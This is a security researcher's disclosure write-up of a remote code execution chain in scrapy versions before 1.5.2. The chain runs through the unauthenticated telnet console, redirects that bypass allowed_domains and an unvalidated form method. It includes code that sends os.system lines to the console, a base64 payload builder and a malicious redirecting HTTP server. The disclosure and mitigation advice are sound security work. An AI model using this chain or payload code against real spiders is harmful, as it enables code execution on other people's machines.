Disclaimer: scrapy 1.5.2 was released on January 22nd. To avoid being exploited, you must either disable the telnet console (enabled by default) or upgrade to at least 1.5.2.

This year the focus of our research will be security in web scraping frameworks. Why? Because it’s important for us. For context, between 2012 and 2017 I worked at Scrapinghub, the world leader in the field, where I programmed more than 500 spiders. At alertot we use web spiders to fetch fresh vulnerabilities from several sources, so scraping is a core component of our stack.

We use scrapy daily, so most of the vulnerabilities will be related to it and its ecosystem, with the goal of improving its security. We also want to explore web scraping frameworks in other languages.

As a precedent, 5 years ago I discovered a nice XXE vulnerability in scrapy and you can read an updated version of that post here.

Ok, let’s go with the new material!

Just to clarify, the vulnerabilities described in this post affect scrapy versions before 1.5.2. As mentioned in the changelog of scrapy 1.6.0, scrapy 1.5.2 introduced some security features in the telnet console, specifically authentication, which protect you from the vulnerabilities I’m going to reveal.
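If upgrading is not possible right away, the console can be switched off in the project settings. A minimal sketch, assuming the default project layout with a settings.py module; TELNETCONSOLE_ENABLED is the scrapy setting that controls the extension:

```python
# settings.py (file name assumes the default scrapy project layout)

# Disable the telnet console extension so nothing listens on port 6023.
TELNETCONSOLE_ENABLED = False
```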

Debugging by default

Getting started with scrapy is easy. As you can see from the homepage, you can run your first spider in seconds, and the log shows information about enabled extensions, middlewares and other options. What has always caught my attention is a telnet service enabled by default.

[scrapy.middleware] INFO: Enabled extensions:
['scrapy.extensions.corestats.CoreStats',
 'scrapy.extensions.telnet.TelnetConsole',
 'scrapy.extensions.memusage.MemoryUsage',
 'scrapy.extensions.logstats.LogStats']
[…]
[scrapy.extensions.telnet] DEBUG: Telnet console listening on 127.0.0.1:6023

It’s the telnet console running on port 6023, whose purpose is to make debugging easier. Telnet services are usually restricted to a fixed set of functions, but this console provides a Python shell in the context of the spider, which makes it powerful for debugging and interesting if someone else gets access to it.

To be honest, it’s not common to turn to the telnet console. I’ve used it to debug spiders that were either running out of memory (in restricted environments) or taking forever, around 5 out of 500+ spiders in total.

My concern was that the console was available without any authentication, so any local user could connect to the port and execute commands in the context of the user running the spider. The first proof of concept is to exploit this local privilege escalation (LPE) bug.

An easy LPE

To demonstrate this exploitation, there are two requirements:

The exploiter has access to the system.

There’s a spider running and exposing the telnet service.

The following spider meets the second requirement: it makes an initial request and then idles because of the download_delay setting.

Our exploit is simple:

It defines a reverse shell, connects to the telnet service and sends a line that executes the reverse shell using Python’s os.system. I’ve created the following video to show this in action!
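The core of that exploit can be sketched with the standard library alone. This is an illustration under assumptions, not the original script: build_command_line and send_python_line are hypothetical helper names, the sketch ignores telnet option negotiation, and it uses a plain socket where the original may have used a telnet client library.

```python
import socket


def build_command_line(command):
    """Return one line of Python that runs `command` through os.system."""
    # repr() quotes the command so it survives as a Python string literal.
    return "__import__('os').system({!r})".format(command)


def send_python_line(line, host="127.0.0.1", port=6023, timeout=5.0):
    """Open a TCP connection to the console and send a single line."""
    with socket.create_connection((host, port), timeout=timeout) as conn:
        conn.sendall(line.encode("ascii") + b"\r\n")
```

Calling send_python_line(build_command_line("id")) against an unauthenticated console would ask it to run id as the user who owns the spider process; the real exploit puts a reverse shell in place of that command.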

Now let’s begin the journey from this local exploitation to a remote one!

Taking control of spider’s requests

Below is a spider created by the command scrapy genspider example example.org.

It contains some class attributes, one of which is allowed_domains. According to the documentation, it is defined as:

An optional list of strings containing domains that this spider is allowed to crawl. Requests for URLs not belonging to the domain names specified in this list (or their subdomains) won’t be followed if OffsiteMiddleware is enabled.

So, if the spider tries to make a request to example.edu, the request is filtered and reported in the log:

[scrapy.spidermiddlewares.offsite] DEBUG: Filtered offsite request to 'example.edu': <GET http://example.edu>
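The rule quoted from the documentation can be approximated in a few lines. This is a sketch of the matching rule only, not scrapy’s actual middleware code, and is_allowed is a hypothetical helper name:

```python
from urllib.parse import urlparse


def is_allowed(url, allowed_domains):
    """Return True if the URL's host is an allowed domain or a subdomain of one."""
    host = (urlparse(url).hostname or "").lower()
    return any(
        host == domain or host.endswith("." + domain)
        for domain in allowed_domains
    )
```

With allowed_domains set to ["example.org"], a URL on www.example.org passes this check while one on example.edu does not.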

However, something interesting happens when a request to a page in an allowed domain is redirected to a domain that is not allowed: the redirected request is not filtered and its response is processed by the spider.

As reported here and in many other issues, it’s a known behavior. Paul Tremberth put some context on the issue and there are some possible fixes (e.g. 1002) but nothing official.

It’s unintended behavior, and under security scrutiny it becomes interesting. Imagine that there’s a dangerous.tld website and you want to create a spider that logs in to the user area. The server side logic would be like this:

The template login.html used on route / displays a form with action=/login . A sample spider for the website would be:

An overview of the steps:

The spider sends a GET request to http://dangerous.tld/ at line 8.

At line 11, it sends a POST request using FormRequest.from_response, which automatically detects the form in the web page and sets the form values based on the formdata dictionary.

At line 18, the spider prints that the authentication was successful.

Let’s run the spider:



[scrapy.core.engine] DEBUG: Crawled (200) <GET http://dangerous.tld/> (referer: None)
[scrapy.core.engine] DEBUG: Crawled (200) <POST http://dangerous.tld/login> (referer: http://dangerous.tld/)
authenticated
[scrapy.core.engine] INFO: Closing spider (finished)

Everything is fine: the spider works and logs in successfully. But what if the website becomes a malicious actor?

By abusing the allowed_domains behavior, the malicious actor could make the spider send requests to domains of its choosing. To demonstrate this, we will review the spider’s steps. The first step of our spider creates a GET request to / and the original code for the home endpoint is:

However, the website (now malicious) changes the logic to:
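A minimal sketch of both variants of the home endpoint, written with the standard library rather than whatever framework the site actually runs. make_handler, HomeHandler and LOGIN_FORM are hypothetical names; the redirect target is passed in by the caller.

```python
from http.server import BaseHTTPRequestHandler

LOGIN_FORM = (
    b"<form action='/login' method='post'>"
    b"<input name='username'><input name='password' type='password'>"
    b"</form>"
)


def make_handler(redirect_to=None):
    """Build a handler class; with redirect_to set, '/' answers with a 302."""

    class HomeHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            if redirect_to is not None:
                # Malicious variant: bounce the spider to another URL.
                self.send_response(302)
                self.send_header("Location", redirect_to)
                self.send_header("Content-Length", "0")
                self.end_headers()
                return
            # Original variant: serve the login form.
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.send_header("Content-Length", str(len(LOGIN_FORM)))
            self.end_headers()
            self.wfile.write(LOGIN_FORM)

        def log_message(self, format, *args):
            pass  # keep the sketch quiet

    return HomeHandler
```

Serving make_handler() gives the well-behaved site, while make_handler("http://example.org") gives the malicious one that redirects every GET.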

Running the spider again gives us the following output:



[scrapy.downloadermiddlewares.redirect] DEBUG: Redirecting (302) to <GET http://example.org> from <GET http://dangerous.tld/>
[scrapy.core.engine] DEBUG: Crawled (200) <GET http://example.org> (referer: None)
[scrapy.core.scraper] ERROR: Spider error processing <GET http://example.org> (referer: None)

Despite the error, the spider has indeed requested http://example.org with a GET request. Moreover, it’s also possible to redirect the POST request (with its body) created in step 2 by using a redirect with code 307.

Actually, it’s a kind of SSRF that I’d name “Spider Side Request Forgery” (everyone wants to create new terms 😃). It’s important to note some details about the environment:

Usually a spider scrapes only one website, so it’s uncommon for it to be authenticated on another website or domain.

The spider requests the URL and there’s likely no way to get the response back (which is different from common SSRF).

Until now, we can control only the full URL and maybe some part of the body in a POST request.

In spite of all these constraints, this kind of vulnerability, like SSRF, opens a new scope: the local network and localhost. We certainly don’t know which services run in the local network, so the key question is: what is surely running on localhost, is unauthenticated and provides code execution capabilities? The telnet service!

Let’s speak telnet language

Now we’re going to redirect the requests to localhost:6023.

Running the spider against this malicious actor gives us a lot of errors:



[scrapy.downloadermiddlewares.redirect] DEBUG: Redirecting (302) to <GET http://localhost:6023> from <GET http://dangerous.tld/>
[scrapy.downloadermiddlewares.retry] DEBUG: Retrying <GET http://localhost:6023> (failed 1 times): [<twisted.python.failure.Failure twisted.web._newclient.ParseError: ('non-integer status code', b'\xff\xfd"\xff\xfd\x1f\xff\xfd\x03\xff\xfb\x01\x1bc>>> \x1b[4hGET / HTTP/1.1\r\r')>]
Unhandled Error
Traceback (most recent call last):
Failure: twisted.internet.error.ConnectionDone: Connection was closed cleanly.

It seems that the number of errors is equal to the number of lines in our GET request (including headers), so we are reaching the telnet port but not sending a line that Python can run. We need more control over the data being sent, since the GET request line and the headers don’t work as Python code. What about the body of the POST request that sends the login credentials?
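To see why every line of the GET request ends in an error, each line can be fed to Python roughly the way the console would receive it. A small sketch, assuming CPython 3 and a hypothetical helper named try_line; the two sample lines stand in for the request line and one header:

```python
def try_line(line):
    """Execute one line as Python; return the exception name, or None on success."""
    try:
        exec(line, {})
    except Exception as exc:  # SyntaxError is also an Exception subclass
        return type(exc).__name__
    return None


request_lines = ["GET / HTTP/1.1", "Host: localhost:6023"]
results = {line: try_line(line) for line in request_lines}
```

The request line happens to parse as a chain of divisions and only fails because the names in it are undefined, whereas the header does not parse at all. Either way, nothing useful gets executed.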

Let’s go back to the original version of the home route and try to exploit the login form logic.

Posting to telnet

The idea behind using a POST request is to control the request’s body, as close to its start as possible, in order to build a valid Python line. The formdata argument passed to FormRequest.from_response updates the form values, appending the new values to the end of the request’s body. That’s great: the malicious actor could add a hidden input to the form and it would sit at the start of the request’s body.

The request’s body sent by the spider starts with malicious=1. However, FormRequest.from_response URL-encodes every input, so it’s not possible to build a valid Python line.
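The effect of URL-encoding on a would-be Python line can be shown with the standard library encoder, which produces the same application/x-www-form-urlencoded format. This is not scrapy’s internal code, and the form values below are hypothetical:

```python
from urllib.parse import urlencode

# Hypothetical form values: a hidden input placed first by the site,
# followed by the credentials the spider supplies.
form_values = [
    ("malicious", "__import__('os')"),
    ("username", "user"),
    ("password", "secret"),
]

body = urlencode(form_values)
```

The quotes and parentheses in the hidden value come out percent-encoded, so what reaches the console is no longer the Python that was intended.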

After that, I tried changing the form’s enctype, but FormRequest doesn’t care about that value and just sets Content-Type: application/x-www-form-urlencoded. Game over!

Is it possible to send a POST request without an encoded body? Yes, by using the normal Request class with method=POST and setting the body. That’s the way to send POST requests with a JSON body, but I don’t consider it a realistic scenario in which the malicious actor could control the body of that request.

Something more to try? I know that the method should be one of a list of valid values (GET, POST, etc.), but let’s check whether scrapy enforces that. We’re going to change the form method to gaga and see the output of the spider:

[scrapy.core.engine] DEBUG: Crawled (200) <GET http://dangerous.tld/> (referer: None)
[scrapy.core.engine] DEBUG: Crawled (405) <GAGA http://dangerous.tld/login?username=user&password=secret> (referer: http://dangerous.tld/)

It doesn’t validate that the method of the form is valid. Good news! If I create an HTTP server supporting the GAGA method, I could send a redirect to localhost:6023/payload, and this new request with the GAGA method will reach the telnet service. There’s hope for us!

Creating the Python line

The idea is to create a valid line and then try to comment out the remainder of the line. Taking into account how an HTTP request is built and the idea of a custom HTTP server, the line eventually sent to the telnet console will be:

GAGA /payload HTTP/1.1

As seen in the previous output, scrapy has uppercased my method gaga to GAGA, so I can’t inject Python code right away because it would be invalid. As the method always comes first, the only option I saw was to use a method like GET =' to start a valid string assignment, and then put the closing apostrophe in the URI and start my Python code there.

payload is Python code and its statements can be separated by semicolons. Commenting out the remainder of the line after payload is not possible, since scrapy deletes the character #. The remainder is HTTP/1.1, so if I declare HTTP as a float, it becomes a valid division and won’t raise any exception. The final line would look like this:
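A sketch of how such a line can be assembled and checked, assuming the string is closed right after the leading slash of the path and using a harmless stand-in for the payload. build_request_line and marker are hypothetical names:

```python
def build_request_line(form_method, path):
    """Mimic the first line of the request: METHOD, path and HTTP version."""
    # The method is uppercased, as the GAGA log line shows.
    return "{} {} HTTP/1.1".format(form_method.upper(), path)


# Harmless stand-in for the real payload (it must not contain spaces).
payload = "marker=42"

line = build_request_line("get ='", "/';" + payload + ";HTTP=1.0;")

namespace = {}
exec(line, namespace)  # raises if the line is not runnable Python
```

Here line is GET =' /';marker=42;HTTP=1.0; HTTP/1.1, which Python reads as a string assignment, the payload, a float assignment and a division whose result is discarded.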

Glueing everything together

The payload section is special:

It can’t contain any space.

The scope is limited, i.e. the variable GET doesn’t exist in the payload scope.

Some characters like < or > are URL-encoded.

Taking these limitations into consideration, we’re going to build our payload like this:

At line 1 we define our reverse shell, at line 2 we encode it in base64, and we use the magic function __import__ to import the modules os and base64, which eventually allow us to execute our reverse shell as a command.
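The construction can be sketched as follows, with a harmless command standing in for the reverse shell. build_payload is a hypothetical helper name, and whether every base64 character survives the trip through the URL unchanged is an assumption not checked here:

```python
import base64


def build_payload(command):
    """Wrap a shell command in a space-free Python expression."""
    encoded = base64.b64encode(command.encode()).decode("ascii")
    return (
        "__import__('os').system("
        "__import__('base64').b64decode('{}').decode())".format(encoded)
    )


# Harmless stand-in for the reverse shell described in the text.
payload = build_payload("echo hello from the spider")
```

Encoding the command in base64 hides its spaces and angle brackets, and __import__ avoids import statements, which would need a space.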

Now we have to create a web server capable of handling this special GET =' method. Since popular frameworks don’t allow that (at least not easily), just as in the XXE exploitation, I had to hack the class BaseHTTPRequestHandler from the http module to serve both the valid GET and the invalid GET =' requests. The custom web server is below:

The important pieces are:

Line 11 serves malicious_login.html template when the server receives the GET request to the endpoint / . What is different in this malicious_login.html file? Our special method!

At line 33 starts the method handle_one_request, copied from the parent class. It’s almost the same, except that at line 52 we detect that the form was sent (by checking for a username string in the URI).

At line 18, we define our malicious logic. First, we set a 307 redirect code so that our weird method is kept and not changed. Then we build our payload and send a Location header to the spider so that it hits the telnet service.
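A compact sketch of such a server. It takes a different route from the one described above: instead of copying handle_one_request, it overrides parse_request and swaps the odd method for a plain token before the stock parser runs. WeirdMethodHandler, do_WEIRD and the placeholder redirect URL are hypothetical.

```python
from http.server import BaseHTTPRequestHandler

WEIRD_METHOD = b"GET ='"  # the form method from the text
REDIRECT_TARGET = "http://localhost:6023/placeholder"  # hypothetical payload URL


class WeirdMethodHandler(BaseHTTPRequestHandler):
    def parse_request(self):
        # The stock parser rejects a method containing a space, so swap it
        # for a plain token before delegating to the parent implementation.
        if self.raw_requestline.startswith(WEIRD_METHOD + b" "):
            rest = self.raw_requestline[len(WEIRD_METHOD):]
            self.raw_requestline = b"WEIRD" + rest
        return super().parse_request()

    def do_GET(self):
        # Serve a login form whose method attribute is the weird method.
        body = (
            b'<form action="/login" method="GET =\'">'
            b'<input name="username"><input name="password"></form>'
        )
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_WEIRD(self):
        # 307 asks the client to repeat the request with the same method.
        self.send_response(307)
        self.send_header("Location", REDIRECT_TARGET)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, format, *args):
        pass  # keep the sketch quiet
```

The handler can be served with HTTPServer(("127.0.0.1", 8000), WeirdMethodHandler).serve_forever(), where the port is an arbitrary choice. In the real exploit the Location header carries the payload-bearing path instead of the placeholder.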

Let’s see this in action!

Conclusion

After this unexpected exploitation, I’m going to open some issues on GitHub to address the problems related to unfiltered redirections and invalid form methods.

I really liked the decision taken in scrapy 1.5.2: they added authentication to the telnet service with a user and password, and if the password is not set, a random and secure one is generated. It’s not optional security, it’s security by design.

I hope you enjoyed this post and stay tuned for the following part of this research!